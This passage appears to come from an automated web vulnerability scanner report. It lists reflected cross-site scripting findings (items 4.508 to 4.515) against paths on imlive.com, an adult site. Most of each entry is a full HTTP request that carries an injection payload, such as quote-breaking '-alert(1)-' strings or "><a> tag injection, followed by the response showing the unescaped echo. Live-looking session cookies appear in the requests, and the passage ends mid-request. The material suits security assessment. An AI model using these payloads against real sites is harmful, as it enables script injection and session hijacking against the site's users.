This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/couple/?f29d6"><a>e94ae201611=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:09 GMT Connection: close Content-Length: 116726 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/couple/?f29d6"><a>e94ae201611=1"> ...[SNIP]...
4.508. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68a0"><a>c6c73a2ee9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:45 GMT Connection: close Content-Length: 214124 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1"> ...[SNIP]...
4.509. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb492'-alert(1)-'e05d7866c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:57 GMT Connection: close Content-Length: 214380 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.510. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae9'-alert(1)-'1ae32c8a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:27 GMT Connection: close Content-Length: 25109 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a ...[SNIP]...
4.511. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a77"><a>b24d1216ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:02 GMT Connection: close Content-Length: 24983 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.512. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video-for-ipod/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5370e"><a>3222e16e08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:12 GMT Connection: close Content-Length: 73010 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.513. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video-for-ipod/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daba9'-alert(1)-'82614b3e5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 73157 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.514. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26eb"><a>443e0c98ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 52111 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.515. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11eb'-alert(1)-'f3d704a6f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; 